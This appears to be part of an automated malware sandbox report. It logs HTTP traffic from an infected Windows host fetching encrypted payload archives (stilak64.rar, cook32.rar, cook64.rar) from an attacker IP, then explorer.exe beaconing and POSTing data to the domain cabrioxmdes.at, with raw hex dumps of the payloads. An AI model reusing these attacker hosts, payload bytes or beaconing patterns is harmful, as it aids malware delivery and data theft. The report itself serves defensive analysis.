                                                        Data Raw: 45 3c 14 4b d0 5d 55 6d d6 39 03 77 c9 7b 8d 6f 22 6a 6a 86 75 9f 21 88 39 51 b9 54 4f 5d 8b 01 83 84 88 c3 c4 e9 b8 f5 df 9b 8c f7 18 3e 22 a4 54 ec cd c8 8b 25 85 47 35 c2 03 d7 74 4b 62 07 1b bb 2d da 89 3a ff f7 f1 ad 45 c1 72 6b db 20 53 03 5c 8d 35 28 67 e8 c8 30 4d 21 98 3c 54 88 2e ff ed e8 2f f1 af fd 4d 6e 64 3a ff cd 30 06 70 c6 c3 c7 1c 6b 06 eb 14 2e fd fb 26 d0 4a 85 ee d4 63 44 d5 4e b6 98 b9 71 80 5c 45 f3 51 26 7a 06 4e 3e 71 04 31 10 c4 e7 9f 57 ea 5a 58 95 cc b9 a4 ff 59 f5 00 06 ee 0b ec 97 ae 6a e1 6b 4b 1e 7f 0c 3e ae 18 69 c7 1e 51 2b 48 08 72 9c 92 de 9e c7 bb 90 a4 47 92 f5 78 c0 ee 8a 9d 27 a5 b1 92 4b 5f e9 30 e2 11 ec 49 67 c8 06 45 e7 20 10 c6 8d 8c e4 90 8e 61 66 c6 55 d8 aa c6 cc e4 41 f1 71 48 ff bb 80 0c 36 7a 64 1e 9b 75 49 85 63 8f c6 f5 2f b3 0d 60 ee c9 58 13 13 e5 cf 75 4c 90 68 3d c8 15 4b 57 a0 28 a9 e8 a9 5a bd 58 d6 fe 11 ac 7c 5b 97 5f 52 79 45 34 d5 d3 90 9a aa 34 dc 39 d7 ed b3 46 50 5a b0 db 01 20 2d 9e 12 34 15 d3 32 cb 4f 90 5b 4a c5 1c 2e 3d 97 91 b1 38 c8 f5 a7 ed 28 5c 09 b0 d3 db e1 30 d5 56 b3 dc b8 f8 1a c4 b7 29 9f f7 59 ed db a5 af 64 5b 86 f4 36 fd 1a 08 a0 83 6e d4 9a 57 57 ac fc c8 38 2d 9a 03 f5 ad 54 d3 e4 da f7 15 09 6f 6b e8 90 58 1a 6f 4b 55 40 18 d7 03 0b e9 29 8e 2c 61 5f d8 55 a1 3a 89 4b 35 17 49 73 1a 92 67 db a8 b3 36 c3 ce 56 29 08 a7 e7 d3 0d 73 4d 10 39 70 43 43 1f 2b cf bb 4c 25 04 7d 1e e2 ea bc 8a 09 9e a8 93 81 ad 69 dc 56 16 25 1a ad fb ed ec 51 4a fc 77 0a 02 0a 90 bf 88 21 55 f2 2f 1c 99 b1 24 5d c8 ac 64 e0 01 60 38 b0 6d 26 b5 4d c7 6c 4a 2b ea 80 1f 22 5f 29 6a 4b 07 aa 05 53 a8 8f fa 9d c6 e8 57 b5 b4 4e e3 9b 52 fc 3e 81 2b 26 5f 9f e9 05 68 b4 d8 9c e2 56 7a 8e 00 54 d1 15 35 58 8e 90 a1 d7 eb 8f 46 6f cb c2 5a ca 30 06 30 cd 90 51 99 2d b5 bd 61 8f ec 60 0d 01 ed f2 75 d8 a4 f7 de ec 2d bd a9 2f 8e 12 cf 96 eb 6a f8 98 31 e0 f8 3e 0e 74 39 26 20 24 68 55 44 16 ff cc a6 23 59 97 0b a1 f1 b6 fb 89 f4 b5 da c0 7d 75 20 3d d9 49 54 38 10 f6 f9 63 e4 05 36 ae d6 4c 8a 05 c2 fe 1e ac 06 9e db 75 32 37 07 e7 c3 b6 9c 5e 83 ca 53 0e da ee 81 d7 b5 5c a1 87 8f 9a ea d3 7f df f5 37 9b b3 46 27 1c ea 74 d5 a7 21 2a 00 91 e4 f6 c1 f1 39 78 e8 d4 20 ff a2 16 21 ef 38 d7 ef 6e eb b6 fd 7e 80 02 1b 35 d7 b6 9a d5 fe 28 df af 35 62 c9 a8 ce 24 c8 c9 34 fb f3 18 cf c2 52 99 d7 20 aa ee ae 1a 1d 48 34 ba f6 0b 9c bb 6e 6f d1 52 51 9f 3c 7a 40 80 b2 97 e7 a6 21 9b 3c a0 89 2b 0b ff 33 6c 1b cb ae 6b db 09 ea 36 86 d7 c1 c4 69 4a 06 9e 57 c1 72 a1 99 ee 89 16 9c d1 ec b2 ee e7 eb 55 ba 48 4a db 98 e8 cd c4 f5 79 f2 bc 0f 72 89 35 21 b2 31 c0 23 84 8c 5d 69 2e 9f 9b 35 4c ed 3e 88 30 80 23 d1 62 db 8d d7 e2 4f 59 ac d0 70 6e c1 ad 08 ba cd 5b f2 5f 8b 71 36 3e b2 47 87 82 4d 06 99 24 e0 f3 12 1f 12 72 de 4d b3 fc fc d2 56 45 00 15 5f a1 4b 31 f1 d2 df 66 89 a7 78 38 b6 1e c4 2b ae 0f d1 fd c2 70 dd b8 02 87 f1 d1 d4 38 b0 ba 8f 54 20 e9 3a 5e 76 41 0d 2c 2f c6 ea 2b d1 e2 c7 75 28 2b 67 9a fd e3 25 da f6 b2 85 38 17 f2 4f 56 eb 5d 6d 18 31 eb f2 a2 4e bb 02 dd 3f af 48 6c e1 55 9d e5 6f 84 4b 4f 52 78 7c 9f 22 c3 68 57 84 28 a1 b0 04 9c 61 e4 fb 3d 66 28 8a f4 72 d0 56 1d 93 cf 96 bc cb 90 b7 44 dd 0c 60 47 93 14 34 9b 81 13 d0 34 9e 64 ef 32 cc 1b bd fa 2b 54 f3 10 ce b9 5a e2 d6 7c 83 87 e2 39 b2 2a b5
                                                        Data Ascii: E<K]Um9w{o"jju!9QTO]>"T%G5tKb-:Erk S\5(g0M!<T./Mnd:0pk.&JcDNq\EQ&zN>q1WZXYjkK>iQ+HrGx'K_0IgE afUAqH6zduIc/`XuLh=KW(ZX|[_RyE449FPZ -42O[J.=8(\0V)Yd[6nWW8-TokXoKU@),a_U:K5Isg6V)sM9pCC+L%}iV%QJw!U/$]d`8m&MlJ+"_)jKSWNR>+&_hVzT5XFoZ00Q-a`u-/j1>t9& $hUD#Y}u =IT8c6Lu27^S\7F't!*9x !8n~5(5b$4R H4noRQ<z@!<+3lk6iJWrUHJyr5!1#]i.5L>0#bOYpn[_q6>GM$rMVE_K1fx8+p8T :^vA,/+u(+g%8OV]m1N?HlUoKORx|"hW(a=f(rVD`G44d2+TZ|9*
                                                        May 4, 2022 16:21:19.983093977 CEST11604OUTGET /stilak64.rar HTTP/1.1
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)
                                                        Host: 193.56.146.127
                                                        Connection: Keep-Alive
                                                        Cache-Control: no-cache
                                                        May 4, 2022 16:21:20.052925110 CEST11605INHTTP/1.1 200 OK
                                                        Server: nginx/1.14.2
                                                        Date: Wed, 04 May 2022 14:21:20 GMT
                                                        Content-Type: application/x-rar-compressed
                                                        Content-Length: 482456
                                                        Last-Modified: Tue, 25 Jan 2022 14:33:43 GMT
                                                        Connection: keep-alive
                                                        ETag: "61f00a47-75c98"
                                                        Accept-Ranges: bytes
                                                        Data Raw: e5 fa 7e 78 18 d2 fa aa c5 af 39 73 64 ae 32 3f 58 b7 78 e0 83 5a 17 11 c3 94 46 e1 67 28 25 c0 56 b0 8e b3 89 83 f4 bc 22 0d e7 0a d8 e8 c8 63 a3 83 3e d6 30 50 e4 a9 9a 1b 71 35 a6 03 6a 66 77 c3 32 b3 17 1b 8d ce 57 f7 d8 a0 18 ad 5c 55 3a 1a ed 82 23 7a 05 16 38 0f f9 f0 29 40 9e e7 83 8c 88 c6 5e a3 a4 95 6f 47 22 95 d0 67 72 d9 9c 24 0c 6e b1 f0 3f 4b f6 52 44 2a 1a 76 be 5b 9a 2b d9 ca 42 6c f4 ed 16 d3 3f ec 46 20 1f 69 de 27 d7 c5 6f 3b 47 5a c3 0b 96 a9 98 fa 58 ac 6c ea b4 b7 36 35 3a 8a a0 f5 d3 98 52 5b 8a 13 4c 80 a3 20 19 f4 a7 de 96 80 a8 16 b7 6b a0 d4 7a 1e 01 0c b3 30 a8 e4 00 e6 75 7c b5 d4 20 a1 5a 63 a2 be f2 7d d2 dc ca 58 28 3a 1b 7d 0d 9c 18 5d 09 e7 cc 47 1e 58 36 56 04 ed a4 0f bd dc c9 36 52 13 2f 3f 87 85 99 c7 7c 30 43 a2 1d 68 ed 50 28 cf 39 bd 1f 09 c3 c3 f3 f8 17 7d da 0e 24 10 f7 48 90 cf e0 69 1a dd ad 3b 05 4e 60 77 b6 88 86 96 09 3e c2 8b 7c 16 15 cf ef 97 87 48 77 3e 4e d7 2d ab 99 1c 0b b9 6f 1f 42 43 bd f5 18 7f de 21 d9 e3 48 aa 53 db e7 b9 e3 6b 68 61 ba ce d1 57 81 b9 38 ae 7c 26 1a 75 2c 8b 75 f9 76 22 07 4d 54 8e 48 ba 50 e1 57 da 02 94 fc be 0e 32 1e 74 69 35 ac 2a 9f e9 3b 08 62 8c f8 5c d6 90 09 f9 2e 09 57 42 2b 16 09 58 22 a3 2c 6d 1f ea 3d 30 89 c0 b7 d1 ce de 73 7f 37 ed 0c 99 8b e2 32 40 d1 f5 56 19 ae 42 96 bb 30 d1 b6 c4 b2 41 a0 9a 04 6b 89 70 99 ae 4a 53 59 9b a0 72 c8 3d 5c 41 6b 23 51 da 55 d8 00 36 6c 5d 76 29 44 f8 6e 10 8c 09 d1 6c 57 fa 5e a8 ad 52 b3 1b d3 fd d9 20 c1 48 a8 77 fc 66 9c 4e 47 2f 03 1f e8 f8 7e d0 88 fb 00 4e 9d 7a 6c 5b 79 24 c5 6d 45 b7 e5 a9 3c 4e 21 ce 32 91 f0 37 af 1a 52 75 0e 9b 76 2a a4 bb 1b 73 62 8c 91 58 03 96 92 6c 0a 53 22 d9 a3 c3 b8 39 59 c3 05 b8 a3 ce 52 db 5b 8c e9 e6 89 b1 b9 fe 68 46 f4 42 9d 67 5a 0c af 7c a0 67 03 10 95 56 48 15 4d 4f 45 7c 22 d7 fd e4 5a d5 b3 c9 b7 6f 4c 11 28 0d 48 1b 59 81 4e 7a b9 75 55 c2 f2 4b a8 be b6 ce 92 44 78 3c 92 d2 e2 3e a3 10 fd e6 70 f3 90 d4 fd 68 bc 32 e5 f8 40 15 6a e0 81 48 d5 12 fa 81 87 cd 26 00 fb cb 0a 40 dc 19 93 b6 ef 14 f4 cf 7b 7d d0 26 e4 22 f3 cb c8 2d 86 57 ea ce f4 11 17 86 21 84 63 78 4c 73 22 38 7f 7b 00 b7 1e eb 44 a5 dc c8 64 6b d5 30 33 88 fe d0 9a 80 4b c3 20 b4 ff 0a 93 21 aa 2b 3f b1 e0 6d c5 d1 e1 a3 de 9e 57 39 c6 ae a0 f2 7d bb b3 7e 9a 89 27 c1 61 3c 35 b0 05 a8 9e 3d ed 6b c6 bd 7f d0 49 31 11 41 03 7a 90 08 6d d5 4b ce 53 7c 99 f9 97 39 0c 4f aa ae af f8 d2 2b b7 4a 40 44 7b e7 73 7b 82 fc 96 63 4f eb e5 d1 b8 54 43 af 66 12 64 31 6e a7 09 3a da 76 64 85 31 79 7e 7a c2 ce 63 1a 49 44 0a b7 91 93 6a de a3 78 f6 7d fe 5c 80 da 20 c9 63 db 06 cd 1d 50 25 cc 5c 20 3a b9 8b f2 ff c4 15 fd a5 a0 e7 63 e8 80 ec 98 d8 e5 da 11 6e 51 12 60 1e 36 a9 a6 14 1b 31 11 fe d0 fa 9f d7 4c 96 b8 60 df 61 c3 ac 86 08 15 56 be fd 91 64 0d 01 2d 9f 21 1c ec ee 82 3f e8 20 93 ef bf d9 be 77 ef 6d 34 99 96 3f 1c 86 df 7e da 56 22 35 61 dc a9 f6 ab 19 dc 96 8b 72 37 d3 ea ec 15 cf b8 39 f9 59 80 31 05 4e 88 bc cb b3 7f f6 c1 ee 0c 33 c7 00 1d b7 1e c0 52 f5 b7 24 88 fc f0 8d 3d 88 e3 12 38 01 1a 66 9b 4b 15 cc 7b ce 47 68 7b 76 84 03 de 88 9a a7 13 a5 56 7c ff f9 52 bb 6b 8b 91 c6 15 c0 9b 0d b2 cf a5 2f 68 1e db 02 4e c0 d3 e7 a0 d9 54 d1 df 7e 96 03 1e 16 59 f6 57 3b 42 11 1c 7f 7e a3 3d 1d b8 08 a2 78 50 1a 3c 6c 97 17 a1 b5 47
                                                        Data Ascii: ~x9sd2?XxZFg(%V"c>0Pq5jfw2W\U:#z8)@^oG"gr$n?KRD*v[+Bl?F i'o;GZXl65:R[L kz0u| Zc}X(:}]GX6V6R/?|0ChP(9}$Hi;N`w>|Hw>N-oBC!HSkhaW8|&u,uv"MTHPW2ti5*;b\.WB+X",m=0s72@VB0AkpJSYr=\Ak#QU6l]v)DnlW^R HwfNG/~Nzl[y$mE<N!27Ruv*sbXlS"9YR[hFBgZ|gVHMOE|"ZoL(HYNzuUKDx<>ph2@jH&@{}&"-W!cxLs"8{Ddk03K !+?mW9}~'a<5=kI1AzmKS|9O+J@D{s{cOTCfd1n:vd1y~zcIDjx}\ cP%\ :cnQ`61L`aVd-!? wm4?~V"5ar79Y1N3R$=8fK{Gh{vV|Rk/hNT~YW;B~=xP<lG
                                                        May 4, 2022 16:21:20.986284018 CEST12097OUTGET /cook32.rar HTTP/1.1
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)
                                                        Host: 193.56.146.127
                                                        Connection: Keep-Alive
                                                        Cache-Control: no-cache
                                                        May 4, 2022 16:21:21.056226969 CEST12098INHTTP/1.1 200 OK
                                                        Server: nginx/1.14.2
                                                        Date: Wed, 04 May 2022 14:21:21 GMT
                                                        Content-Type: application/x-rar-compressed
                                                        Content-Length: 340630
                                                        Last-Modified: Tue, 25 Jan 2022 14:33:43 GMT
                                                        Connection: keep-alive
                                                        ETag: "61f00a47-53296"
                                                        Accept-Ranges: bytes
                                                        Data Raw: 6d 89 b6 ca 2a ed 42 3d 7d 47 d0 53 23 32 6f 53 6a 18 43 e5 c9 c2 0c 08 3c 98 eb e5 5a fa 10 6b 57 26 bc 9b f0 a5 12 7a 6c 04 9f 5a 67 bf da 73 38 dc 4f f9 57 6f 44 87 6a 61 4c 28 46 19 8a 17 c0 a1 29 d4 cb d9 7f df 5b 7c 63 f5 13 a1 14 71 6d 42 2e b2 f5 59 29 7c 87 a1 85 d4 1c 9b 3f ef a8 f6 e4 e5 fd 9c 77 6b 20 0a ef 83 e2 4b 0a 08 c3 2a d3 f8 29 c9 6f c3 69 e9 5d 3e 42 1c c2 51 2c b5 2a 1c 83 56 42 6e 66 c9 a9 37 88 6e c8 92 7c 71 34 5e d0 9a 79 dd f4 a2 c9 6c c3 09 ee fb a8 1b 7c 8a 32 22 e3 f7 3d 56 be e1 1b 69 76 c3 79 f0 46 77 7a a8 11 e3 c7 c0 53 1b 6b 6a 48 d1 85 31 39 dc fe 06 d6 e9 74 64 06 24 8a d0 8e 4b ff f4 e0 cf 12 83 f0 05 39 35 bb e3 f8 83 a9 dc bd ea da f6 e9 5f 80 4f 7a c4 55 e5 29 3e 8d d9 ac 0f 26 10 c0 c7 5f d6 e8 5f 6c 78 c7 e2 1e 1e d9 1c 3b bc 29 52 3c b6 c1 c3 b2 01 02 6a 02 c6 95 a6 72 ff df 84 59 a0 a0 db e2 e6 61 6b ba 2a 7d ee 05 0b 52 ad e3 1d 87 e3 c9 17 0a 40 aa f1 94 02 d5 33 eb d7 c3 f0 67 c4 1c 20 0d 95 ce 30 f5 d2 87 8d 40 8a ce 79 ed d6 bb 66 a3 f5 1c 4d 0a f7 5a 18 80 ed f6 bf 80 65 ba e9 43 dd 51 e1 b6 2c ca bd 55 f4 95 f9 92 ac 90 09 e9 f4 09 f5 39 a4 0e 4b f1 a5 83 6a 47 bb b6 4c 36 2a 21 5d e6 d8 72 78 53 fb d9 f7 f2 8d 9e 11 cb d0 8f 4a 21 bc 88 58 fe c1 f0 90 99 df 71 6b 54 3f f5 df d7 1f ad 34 ca c0 05 38 eb 6b 0e d7 a7 9b 5c dc d4 7e 5b 0a 34 fa a2 0e 99 8a e5 8d 14 fb d7 b1 7a 9e 07 60 aa 1b 77 b1 d0 f9 ab 5b f3 85 9c a1 4d be 42 b4 ae c2 71 be a8 9a 56 92 9d ea b6 58 bc 12 97 42 7b 22 d2 2c cf 6d a5 89 e2 82 96 94 dd 13 7b 7b 6d 9a c9 09 92 7d 64 83 ca 77 f7 cb 2f 1b b9 09 85 20 63 ca d9 45 9c 9c c7 0d 83 7b ff 7f ac 43 db 3f bd 63 b6 22 fd 6e 33 e3 6c 4b ae ad ae cc 87 37 65 d5 32 68 2e 23 95 b8 bc c8 86 48 48 3d 72 d7 a7 da 5d 2d 7f 47 a5 6a f6 ad a7 ff 84 58 75 92 9a 9d a4 dd d2 f5 ad df ad 48 fb bd 27 0e 25 49 5e 64 16 b6 0e 73 f9 e4 17 d2 5b 6d c8 22 d8 43 48 56 15 fb 9c 42 56 39 a3 70 64 c8 33 f6 e4 9f 56 0d ad ab 1d d6 13 6b 29 72 9a 9f 67 d1 09 d8 8d a9 f1 da 83 11 71 c6 36 f6 0f fd 15 ea 7d c2 b9 7c 50 0a 64 57 df 84 23 16 33 a9 63 44 2c cd 9f 91 91 48 62 6f 01 de a9 79 f9 9f e5 da c2 2f 3d 3d 8d f3 15 90 5e 40 97 b7 89 80 7c e7 b8 25 3b e5 fd c3 59 b8 96 6f 1b f5 f1 a8 e7 93 9a f3 2e 1b 20 f5 81 30 04 e7 1f b1 c1 26 0a 66 9e 5a 26 8a 84 87 62 19 40 91 4b 09 f5 b6 6e dd 85 e3 0c c3 8d 5c 81 1c 75 ff cd 82 f6 f9 19 9b b7 89 84 7f 7e 93 48 e8 dd 3f 78 6e 56 16 76 fb 0c 99 76 d6 ab a5 59 c5 f8 69 60 1c 39 69 a2 30 2b 2d 13 2e 87 9f 15 80 a5 95 d0 d5 74 62 e0 7e 5b e2 31 9a 26 55 f7 26 85 94 f7 52 17 b5 b4 48 bd 3d d9 41 ae 57 4b fc d6 18 61 b6 bf 00 46 21 bf 78 9c bf 34 f9 82 ea 25 00 a1 1d f6 6c 13 14 e9 e7 c8 43 e0 34 cb 4c 95 b5 74 cc d4 24 c4 46 51 f5 86 70 d2 f9 54 8b 6d 76 cf f6 78 76 c0 f8 e8 bf dc 50 7a a6 3b e2 c8 5c 13 da bb fc d7 c4 a4 7d ec 16 79 f1 e7 b8 91 93 a6 8f e9 71 24 2d 4a 35 34 c5 60 83 1b 33 af 4f 95 07 b7 e8 27 92 89 62 82 70 1f ac da f6 38 c8 6f d7 2d da 85 e7 6b 98 21 b8 ba fe 3c ed a9 10 6f 75 e0 75 35 b9 41 a8 d5 98 c5 64 ff 05 c0 67 c2 99 d2 5d 5a 36 a2 8c 3f 4d 85 8c 88 c5 d3 2f 07 7d 8d 0e d5 35 3b 0a a3 ba e6 c9 f3 45 c3 d1 20 d1 d0 70 9c 38 4d 7d 5f 8d 5a 3c 5c be c4 8d 0b 94 a2 61 ec 32 78 8a 7d c2 ec d9 af 05 02 38 d6 ed f3 9c ee 02 c6 6a 90 1b 1a 76 57 73 d7 ed a5 1f ee 98 96 63
                                                        Data Ascii: m*B=}GS#2oSjC<ZkW&zlZgs8OWoDjaL(F)[|cqmB.Y)|?wk K*)oi]>BQ,*VBnf7n|q4^yl|2"=VivyFwzSkjH19td$K95_OzU)>&__lx;)R<jrYak*}R@3g 0@yfMZeCQ,U9KjGL6*!]rxSJ!XqkT?48k\~[4z`w[MBqVXB{",m{{m}dw/ cE{C?c"n3lK7e2h.#HH=r]-GjXuH'%I^ds[m"CHVBV9pd3Vk)rgq6}|PdW#3cD,Hboy/==^@|%;Yo. 0&fZ&b@Kn\u~H?xnVvvYi`9i0+-.tb~[1&U&RH=AWKaF!x4%lC4Lt$FQpTmvxvPz;\}yq$-J54`3O'bp8o-k!<ouu5Adg]Z6?M/}5;E p8M}_Z<\a2x}8jvWsc
                                                        May 4, 2022 16:21:21.354583979 CEST12447OUTGET /cook64.rar HTTP/1.1
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)
                                                        Host: 193.56.146.127
                                                        Connection: Keep-Alive
                                                        Cache-Control: no-cache
                                                        May 4, 2022 16:21:21.424647093 CEST12448INHTTP/1.1 200 OK
                                                        Server: nginx/1.14.2
                                                        Date: Wed, 04 May 2022 14:21:21 GMT
                                                        Content-Type: application/x-rar-compressed
                                                        Content-Length: 476828
                                                        Last-Modified: Tue, 25 Jan 2022 14:33:43 GMT
                                                        Connection: keep-alive
                                                        ETag: "61f00a47-7469c"
                                                        Accept-Ranges: bytes
                                                        Data Raw: 5d 8b 8b 70 09 0e 1d d9 90 dd ab 7b 33 6a c0 52 31 a0 b6 04 f6 3f 2c 2e c3 a2 b0 07 ab 38 fc 74 ed fa 59 e1 54 59 8e 5a d4 67 4d 48 cf 9f 04 d9 44 fe 6c 57 29 99 30 f7 01 d0 36 58 0f ca d2 73 70 1b f2 92 c3 7c b0 3e 78 94 57 f4 4b 39 77 05 b8 ed 02 5e 12 4d a6 e1 05 bd f8 f7 d0 d3 a9 57 55 34 57 87 40 e8 b9 6e f0 ed b3 db 4d d9 05 e2 95 5c 9f 02 48 e3 34 67 c4 9b c0 1d c1 c5 bb 24 97 c6 50 01 fa 49 39 fe 75 1f 0a cd 7a 85 7c 3e 16 e7 e0 9d 81 48 fc dd e7 f1 c9 40 7f d9 9b a3 0d 47 7e 92 cb bf b8 20 da cd 79 0a 4d 36 0d b3 c3 07 69 6d f6 b1 f7 16 08 4d 9d 4d 3f 64 80 88 78 d5 5e 87 99 18 f7 12 21 85 7b eb e6 e1 da 00 0b 9e 5a 71 f7 a8 d7 1a 90 73 9e f2 5c 58 fe c7 3b d3 50 e2 f5 6a 2c 9d 8e 92 29 e1 cd 48 ef 98 a1 fb b3 f8 a2 4e b0 b5 38 26 8d 53 db a2 fc ce 6d 68 10 e7 2f e5 f9 85 ed 30 21 92 ff 70 02 7e 81 35 20 c0 ef ca c1 26 c7 af 71 43 ee ae 83 a2 48 a2 80 67 06 47 4f cf 11 52 22 6c 92 7d d5 97 98 fc 3a 05 f7 bd 2a 25 56 2a 75 75 71 a8 d9 03 23 39 d2 9d e4 98 16 0c 8c db b9 7a 07 7c 0a 6d ff 9b 86 a2 66 05 12 59 42 0d 1c 4c 41 17 ef 22 93 8b 8f b4 16 ea a7 65 a2 f2 86 50 8e 7f 69 86 be 4c a4 a9 59 1c 9b f3 9f 0b 9c 10 6e b5 22 b7 ae 7b b1 fe 1c 95 d6 9c a1 09 44 dc 9c f4 f1 4c de 51 5d 68 07 c9 c4 5d ff 0c e1 b6 0c 22 f4 4b bd 4c 90 32 b0 ba 85 9f 26 76 c8 98 ea 24 ea 9b e4 b8 a6 7c bf a3 36 76 9d e4 10 f7 ba 31 a7 43 fa f1 62 26 3d 4c 8a 9a 05 4f 31 c1 45 8d 82 49 7e f1 5b aa 01 0e 36 1c 0b 54 ae 27 c3 5c cf eb d9 3d 13 11 c3 33 c7 63 79 1d aa 1c f7 d5 73 58 da 62 fd c5 2e e1 2f a0 4a f5 15 c6 7d 26 3d 43 80 c9 3c 2d 7f 2e df 94 f4 e4 95 7a e6 92 36 e2 eb 6c c6 08 80 4f 5c 8d 79 5f 59 ac b1 a8 ef 57 99 26 e7 a7 c0 52 18 16 02 ad 0c ca ef c6 74 5a f0 04 33 a3 ea 81 15 32 78 f5 39 db 07 45 f6 b7 f4 d8 76 44 f7 d9 70 ab 52 38 48 6d d9 74 d0 2b a1 02 00 72 9d 11 b6 31 88 95 31 42 48 0e 6a 29 df f0 9b 9a 66 a0 68 bc e2 0d b6 70 a0 15 a7 9b cc 07 b6 9c e4 e5 e5 21 8e 3c 9b 89 9b 15 63 98 47 50 c0 47 eb 3d f9 48 20 db b4 1f 17 e2 6a 16 4a 1b 35 06 f4 1a cc 7a 68 f8 92 dd d7 a1 0b 72 9b 63 7d b3 a3 e5 04 d5 3a f1 15 8f e0 28 7f 17 89 c7 ad 50 62 02 dd 90 74 f4 7a 95 9c 54 cc e6 8f e6 3b 81 d1 eb 80 de 9b b8 d3 2f 23 e3 f4 5c 16 9c 16 32 bd d4 53 7b b8 53 37 2c 83 21 c6 91 69 06 67 e8 55 85 41 ec 02 90 9a be 15 0d 85 18 50 dc cf 14 a8 c7 e1 bf 67 da 8a 41 15 9d 84 1d 65 56 97 db 7e 39 d3 0e 82 a4 32 48 5f d9 30 ef 1b 7e e4 fa b9 c2 c6 b0 d9 7d f4 6f 1c 4d 31 6b a6 9a b9 5e be 6e 9b 66 8f a3 52 6d ce dd 26 f8 1d bf d1 d8 fe 25 26 12 38 1b 82 d0 20 3b b0 3a fc 78 fc c8 27 35 80 8c 3d 50 5e ac c0 9e 9d 60 4a d8 67 fd 0b 23 73 81 de e8 b6 92 23 2a 8b 3a 3e 6b c6 30 c7 50 f7 e0 9f 2d 41 bc 35 53 4a e5 0d 04 6e b3 3e 74 33 6d 8f 7e 23 d7 bf 78 78 ef ae 5a b9 bc 02 45 46 d8 8c 41 c3 a9 4e 7f 95 d2 4c d0 e0 2a 09 df b3 ad d9 52 c0 cb 92 bb 54 36 e8 82 b6 65 88 39 d7 a3 ec 7f 3a 70 bc 89 a3 24 54 c1 36 15 89 70 44 54 cc 9d 36 48 a4 0b 08 82 70 e1 8f 42 83 01 2c 8a 46 89 74 3b f0 2e 6c dd 01 ce 2d 06 bc 25 97 f6 98 1e d3 17 ab 54 a1 bc 7d b1 0b ce 72 55 e0 4b 60 12 34 c2 16 18 66 cb dc a6 fa 75 1c eb cf 35 22 58 8b 6f b0 53 f0 ac 29 7b 05 a8 36 39 ec ea 59 a1 d0 84 23 99 b9 d8 00 95 20 e1 45 61 c2 89 5d 33 c2 03 ce 59 4c a8 a0 7c b9 1a cb 8b b5 01 26 93 12 8e 7c 1e fb be 43 c8 53 8c
                                                        Data Ascii: ]p{3jR1?,.8tYTYZgMHDlW)06Xsp|>xWK9w^MWU4W@nM\H4g$PI9uz|>H@G~ yM6imMM?dx^!{Zqs\X;Pj,)HN8&Smh/0!p~5 &qCHgGOR"l}:*%V*uuq#9z|mfYBLA"ePiLYn"{DLQ]h]"KL2&v$|6v1Cb&=LO1EI~[6T'\=3cysXb./J}&=C<-.z6lO\y_YW&RtZ32x9EvDpR8Hmt+r11BHj)fhp!<cGPG=H jJ5zhrc}:(PbtzT;/#\2S{S7,!igUAPgAeV~92H_0~}oM1k^nfRm&%&8 ;:x'5=P^`Jg#s#*:>k0P-A5SJn>t3m~#xxZEFANL*RT6e9:p$T6pDT6HpB,Ft;.l-%T}rUK`4fu5"XoS){69Y# Ea]3YL|&|CS


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        2192.168.2.449825116.121.62.23780C:\Windows\explorer.exe
                                                        TimestampkBytes transferredDirectionData
                                                        May 4, 2022 16:21:23.154438972 CEST12942OUTGET /images/V0NO_2B_2/BKtxKUyqNZPWTGW_2Fsb/gcra1vUcqfsugEwbqkg/clC4xOvGOnv1IfCbC3KpDN/55o4c2l5_2FQ5/A5h2Nudl/_2BMxe_2B5DeFfkUNA5tHFs/S3JUh8OxeK/2_2FH31SGSIQagA1v/1cdYZqzVHkrq/508837BCT1F/BqNIRlNPeT4DuE/7TejdrPxV03GXRoV_2Bn_/2BLetz9nfjFhAFKH/XzqzBZbDgeQBfEL/knvoVinzLGANv8j5GP/MiBxeoPgM/h0e0hiZpA4rDs4gKFEOR/z8BKZois5KcoiHgGkl6/XYwiOQ0Qo28lWHm/byQpQm.gif HTTP/1.1
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)
                                                        Host: cabrioxmdes.at
                                                        Connection: Keep-Alive
                                                        Cache-Control: no-cache
                                                        May 4, 2022 16:21:24.441509008 CEST12942INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Wed, 04 May 2022 14:21:24 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Connection: close
                                                        Vary: Accept-Encoding


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        3192.168.2.449836116.121.62.23780C:\Windows\explorer.exe
                                                        TimestampkBytes transferredDirectionData
                                                        May 4, 2022 16:21:35.078524113 CEST12968OUTPOST /images/ycZgts7gGB1TTI_2BJ/kAFzWH5dO/EouFwEOlBnMQFd_2B9cm/hFllbR62yV2D6DpnFIT/1m7iL_2BNn_2FiW_2Fey46/UbiTO8_2BKiyZ/X_2Fw6C8/_2BYemffpjXv9AYl0VWdt5P/DII_2F9NDv/YDhvS6DNSnB9Ol87V/O37_2FvxkOTf/eEAAdQaaXJB/BDgwSc3qOdxCUN/5Mw_2FSE2hFdSZTrFlwZP/7mWxeoDw9vW5V8uP/HsY9e6csLMEHi74/FnD5yUP5tDxrs5O87k/gamDdyFb5/q42.bmp HTTP/1.1
                                                        Content-Type: multipart/form-data; boundary=318247997342640097891112487322
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)
                                                        Host: cabrioxmdes.at
                                                        Content-Length: 563
                                                        Connection: Keep-Alive
                                                        Cache-Control: no-cache
                                                        May 4, 2022 16:21:36.648550987 CEST12983INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Wed, 04 May 2022 14:21:36 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Connection: close
                                                        Vary: Accept-Encoding


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        4192.168.2.449845116.121.62.23780C:\Windows\explorer.exe
                                                        TimestampkBytes transferredDirectionData
